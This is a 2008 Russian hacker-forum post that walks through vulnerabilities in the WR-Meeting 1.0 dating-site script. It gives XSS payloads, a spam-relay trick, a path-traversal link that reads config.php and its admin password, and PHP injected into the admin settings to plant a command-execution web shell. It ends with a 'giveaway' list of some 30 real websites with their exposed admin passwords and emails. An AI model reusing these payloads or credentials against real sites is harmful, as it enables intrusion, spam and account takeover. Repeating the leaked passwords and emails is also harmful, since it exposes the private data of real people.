ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Уязвимости в WR-Meeting 1.0
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Уязвимости в WR-Meeting 1.0
  #1  
Старый 17.05.2008, 21:12
Аватар для otmorozok428
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию Уязвимости в WR-Meeting 1.0
Продолжаем оперировать семейство скриптов WR-Script. Сегодня в поле нашего зрения - служба знакомств WR-Meeting 1.0. Итак, я нашёл следующие уязвимости...


1. Пассивные XSS.

Цитата:
http://localhost/wrm/addmsg.php?event=mailto&msnum=22268&name=wr<script >alert()</script>&email=loh@loh.ru

http://localhost/wrm/addmsg.php?event=mailto&msnum=22268&name=wr&email= loh@loh.ru><script>alert()</script><

http://localhost/wrm/addmsg.php?event=mailto&msnum=22268&name=wr&email= loh@loh.ru&id=23><script>alert()</script><
На странице
Цитата:
http://localhost/wrm/index.php?event=addform
можно передать в качестве параметров POST-формы $city, $work, $url, $icq, параметры с длиной строки более 25 символов, содержащие строчку
Цитата:
<script>alert()</script>
Например,
Цитата:
1234567890<script>alert()</script>
Для этого придётся заменить параметр maxlength=25 в POST-форме на maxlength=45.

Данный класс уязвимостей представляет интерес скорее теоретический... Перейдём к практике...


2. Рассылка спама

Если параметр $sendmail в файле config.php равен "1" , т.е. отправка писем администратором НЕ запрещена, службу WR-Meeting можно использовать в качестве прокси для спам-рассылок. Так, ссылка
Цитата:
http://localhost/wrm/addmsg.php?event=mailto&msnum=22268&name=wr&email= loh@loh.ru
передаст email loh@loh.ru в форму отправки сообщения, в скрытое поле
Цитата:
<INPUT type=hidden name=uemail value=loh@loh.ru>
откуда можно слать что угодно и кому захочется. Собственно, скрипт для спам-рассылки наколбасить будет совсем несложно.


3. Создание на сервере .dat файлов с неприлично длинными цифровыми именами

Цитата:
http://localhost/wrm/addmsg.php?id=&msnum=22268
Откроем исходный код страницы и заменим
Цитата:
<FORM action='addmsg.php?event=add&msnum=22268' method=post name=addForm>
на
Цитата:
<FORM action='http://localhost/wrm/addmsg.php?event=add&msnum=99999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999' method=post name=addForm>
Сохраним страницу на жесткий диск, откроем её оттуда и нажмём кнопку "Сохранить". После этого на удалённом сервере появится файл с именем
Цитата:
99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 9999999999999999999999999999999999.dat
Чистой воды хулиганство...


4. Возможность выставления нестандартной оценки для фотографий.

Вместо стандартной шкалы оценок от 1 до 5, можно выставлять свои оценки от -9 до 99. Так понравившаяся тебе девушка может заполучить сразу 99 баллов за свою фотку, а парнишка-конкурент может схлопотать -9 баллов. Естественно, твоя оценка повлияет и на средний балл за фотографию. Идем на похожий линк
Цитата:
http://localhost/wrm/index.php?event=coment&msnum=22268
открываем исходный код странички, меняем
Цитата:
<INPUT name=type type=radio value='5'>5</TD></TR>
на
Цитата:
<INPUT name=type type=radio value='99'>99</TD></TR>
сохраняем страничку на локальный диск и открываем её оттуда... Ставим нашу оценку...


5. Просмотр файлов на сервере

Параметр msnum в файле index.php вставляется в качестве имени файла "как есть"
PHP код:
if ($_GET['event']=="coment")  {$msnum=$_GET['msnum']; 

.......................................................

if (is_file("$datadir/$msnum.dat")) {
$rlines=file("$datadir/$msnum.dat");

....................................................... 
, что даёт возможность просматривать файлы на сервере. Так, ссылка вида
Цитата:
http://localhost/wrm/index.php?event=coment&msnum=../config.php%00
позволяет просмотреть содержимое файла config.php , где в открытом виде хранится пароль от админки.

Фиксится данная уязвимость заменой условия
PHP код:
if ($_GET['event']=="coment")  {$msnum=$_GET['msnum']; 

....................................................... 
на
PHP код:
if ($_GET['event']=="coment"&&ctype_digit($_GET['msnum'])) {$msnum=$_GET['msnum']; 

....................................................... 

6. Заливка шелла

Смотрим админский пасс в файле config.php, заходим в админку

Цитата:
http://localhost/wrm/admin.php
на вкладку "Конфигурирование", ищем пункт "Относительный путь до папки с данными скрипта" и

заменяем в нём ./fotodat на

./fotodat";if(isset($_GET["cmd"])){include($cmd);}//

для удалённого инклуда шелла

или на

./fotodat"; if (isset($_GET['cmd'])){system($_GET['cmd']);}//

для выполнения команд на сервере. Первый вариант прокатит только при директиве PHP-интерпретатора allow_url_fopen = On ,второй более перспективен.

Жмём кнопку "Сохранить конфигурацию". Шелл готов к работе.


7. Раздача

Вот, нагуглилось...
Цитата:
http://love.sibdoska.ru/index.php?event=coment&msnum=../config.php%00

$password="s1"; // Пароль админа

$adminemail="Miha-ingener@yandex.ru"; // Емайл админа

------------------------------------------------------------------------

http://www.gay-dosug.ru/index.php?event=coment&msnum=../config.php%00

$password="390035"; // Пароль админа

$adminemail="4033@mail.ru"; // Емайл админа

------------------------------------------------------------------------

http://www.sayanboard.ru/love/index.php?event=coment&msnum=../config.php%00

$password="pvo71599e"; // Пароль админа

$adminemail="admin@sayanboard.ru"; // Емайл админа

------------------------------------------------------------------------

http://www.garda.org.ua/meeting/admin.php?pswrd=admin

------------------------------------------------------------------------

http://www.sparta.md/meeting/index.php?event=coment&msnum=../config.php%00

$password="430-430"; // Пароль админа

$adminemail="email@email.ru"; // Емайл админа

------------------------------------------------------------------------

http://repairnetwork.ru/index.php?event=coment&msnum=../config.php%00

$password="4onada"; // Пароль админа

$adminemail="email@email.ru"; // Емайл админа

------------------------------------------------------------------------

Хитрый аффтар снёс админку из демо-версии

http://www.wr-script.ru/meeting/index.php?event=coment&msnum=../config.php%00

$password="q1q2"; // Пароль админа

$adminemail="miha-ingener@yandex.ru"; // Емайл админа

------------------------------------------------------------------------

http://love.mynickel.net.ru/index.php?event=coment&msnum=../config.php%00

$password="Suchka87"; // Пароль админа

$adminemail="admin@myickel.net.ru"; // Емайл админа
------------------------------------------------------------------------

http://starominska.ru/meeting/index.php?event=coment&msnum=../config.php%00

$password="cm6gnk"; // Пароль админа

$adminemail="admin@starominska.ru"; // Емайл админа

------------------------------------------------------------------------

http://diana.mindlife.ru/index.php?event=coment&msnum=../config.php%00

$password="dimap"; // Пароль админа

$adminemail="astro_d@inbox.ru"; // Емайл админа

------------------------------------------------------------------------

http://www.inetsky.ru/meeting/index.php?event=coment&msnum=../config.php%00

$password="pyfrjvmcz32"; // Пароль админа

$adminemail="wacher@mail.inetsky.ru"; // Емайл админа

------------------------------------------------------------------------

http://213.8.173.232/9/index.php?event=coment&msnum=../config.php%00

$password="admin"; // Пароль админа

$adminemail="Miha-ingener@yandex.ru"; // Емайл админа

------------------------------------------------------------------------

http://znakomstva.foxcat.ru/index.php?event=coment&msnum=../config.php%00

$password="010377"; // Пароль админа

$adminemail="alexey__fedotov@mail.ru"; // Емайл админа

------------------------------------------------------------------------

http://allove.in/admin.php?pswrd=admin

------------------------------------------------------------------------

http://php-ru.info/1/meet/index.php?event=coment&msnum=../config.php%00

$password="Virusebola"; // Пароль админа

$adminemail="gamovic@rambler.ru"; // Емайл админа
------------------------------------------------------------------------

http://vs.tj/index.php?event=coment&msnum=../config.php%00

$password="ghbdtn"; // Пароль админа

$adminemail="email@email.ru"; // Емайл админа

------------------------------------------------------------------------

http://www.videomontazh.ru/meeting/index.php?event=coment&msnum=../config.php%00

$password="lalala"; // Пароль админа

$adminemail="email@email.ru"; // Емайл админа

------------------------------------------------------------------------

http://www.ineedlove.metroland.ru/index.php?event=coment&msnum=../config.php%00

$password="reeboot"; // Пароль админа

$adminemail="code-soft@programist.ru"; // Емайл админа

------------------------------------------------------------------------

http://zauralrb.info/znak/index.php?event=coment&msnum=../config.php%00

$password="kvartira"; // Пароль админа

$adminemail="admin@zauralrb.info"; // Емайл админа

------------------------------------------------------------------------

http://www.znamenka75.com/meeting/admin.php?pswrd=admin

------------------------------------------------------------------------

http://www.kshyms.com/acquaintances/admin.php?pswrd=admin

-----------------------------------------------------------------------

http://lubny.com.ua/meeting/admin.php?pswrd=admin

-----------------------------------------------------------------------

http://emenci.com/foto/index.php?event=coment&msnum=../config.php%00

$password="vflfufcrfh"; // Пароль админа

$adminemail="email@email.ru"; // Емайл админа

------------------------------------------------------------------------

http://aleks-an.net.ru/love/index.php?event=coment&msnum=../config.php%00

$password="aleksadm"; // Пароль админа

$adminemail="andr_aleks@mail.ru"; // Емайл админа

------------------------------------------------------------------------

http://rig.fatal.ru/znakomstva/index.php?event=coment&msnum=../config.php%00

$password="16071960"; // Пароль админа

$adminemail="zdvika@narod.ru"; // Емайл админа

------------------------------------------------------------------------

http://rk-pechora.ru/znakomstva/index.php?event=coment&msnum=../config.php%00

$password="PE8KW1M59d"; // Пароль админа

$adminemail="admin@nikolai800.ru"; // Емайл админа

------------------------------------------------------------------------

http://oberon.oriontv.net/znak/index.php?event=coment&msnum=../config.php%00

$password="vvvvvv"; // Пароль админа

$adminemail="serhio@oriontv.net"; // Емайл админа
К некоторым админкам, где уязвимость не юзалась, подошёл дефолтовый пароль admin.


*******
Последний раз редактировалось otmorozok428; 17.05.2008 в 22:41..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В свежем Safari 3.1 для Windows обнаружены уязвимости Ali_MiX Мировые новости 0 08.04.2008 16:13
Классификация уязвимостей flintstone Статьи 1 16.01.2008 18:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ